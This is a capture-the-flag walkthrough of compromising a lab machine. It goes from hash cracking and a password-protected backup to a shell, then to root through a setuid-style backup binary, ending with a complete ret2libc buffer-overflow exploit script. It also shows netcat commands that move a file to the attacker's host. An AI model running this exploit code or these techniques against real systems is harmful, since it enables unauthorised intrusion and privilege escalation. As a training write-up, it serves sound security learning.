Initial scan shows 2 open ports
I found 3 users with password hashes.
I logged in with credentials above, although this user doesn’t have admin privileges.
I went back to sitemap to check everything regarding api. Most of my requests were asking for update using header: “If-Modified-Since”. After recrawling all site with a “clean” refresh I could see:
I got admin user hash which is crackable:
With this credentials I got access to admin page:
Backup file:
This zip is password protected. I used zip2john to convert file to format which is accepted by johntheripper.
Unzip:
Search in all files for specific string:
grep -rnw ‘.’ -e ‘password’
Manually going through files:
I will try this credentials for SSH client:
It looks like this javascript code execute command which is stored somewhere inside tasks table.
I tried to create shell which is run with privileges of tom.
Entry has been removed from db as it was stated in the code. Commands has executed. Unfortunately, shell drops instantly.
It works with dash:
I didn’t assign sticky bit to “dash_x”
Dash manual:
/usr/local/bin/backup looks interesting, it is owned by root user and admin group.
Using netcat to transfer backup file :
Destination:
nc -lvnp 4444 > backup
Sender:
nc 10.10.14.3 4444 < /usr/local/bin/backup
Content of backup result:
I tried to open this file on remote host
Copied keys to my system
I used again strace to find something interesting
I went back to dump of backup and found correct way to use backup binary
Now I know how this binary works and which variables are necessary to run it. I will check output on my device
Password for unzipping is “magicword”
I will try to do the same on remote host. Maybe I won’t get troll face again…
Hmm I will try to make symbolic link to root directory
Maybe “root” inside name is prohibited?
I got both flags, but I still want to make root shell. I need to find a way to abuse backup binary. Going back to binwalk:
I will try to abuse the unix path
I will need for sure -q and backup_key to run this command
/bin/bash must be in the 2nd argument, because 3rd argument is being redirected to /dev/null and we doesn’t get output of commands
Now I’ve got full root shell.
Buffer overflow part
You can notice in screeshot above that there is a new part in the beggining
Inside gdb-peda with ./backup binary:
r destro 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
515 length:
516 payload overwritten EIP, so I can change last 4 bytes to something diffrent:
Now I will be collecting data for script
Used as: libc_base_addr
Used as: system_off
Used in exit_off
strings -a -t x /listrings -a -t x /lib32/libc.so.6 | grep bin/sh
Complete code:
I moved the script to remote host and run.
Code:
#Based on IppSec Video
#https://www.youtube.com/watch?v=sW10TlZF62w&list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf&index=5
from subprocess import call
import struct
libc_base_addr = 0xf75f9000
system_off = 0x0003a940
exit_off = 0x0002e7d0
arg_off = 0x00015900b
system_addr = struct.pack("<I",libc_base_addr+system_off)
exit_addr = struct.pack("<I",libc_base_addr+exit_off)
arg_addr = struct.pack("<I",libc_base_addr+arg_off)
buf = "A" * 512
buf += system_addr
buf += exit_addr
buf += arg_addr
#Extra
key = "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474"
i = 0
while (i<512):
print "Try %s" %i
i += 1
ret = call(["/usr/local/bin/backup","destro",key,buf])
Successful buffer overflow 🙂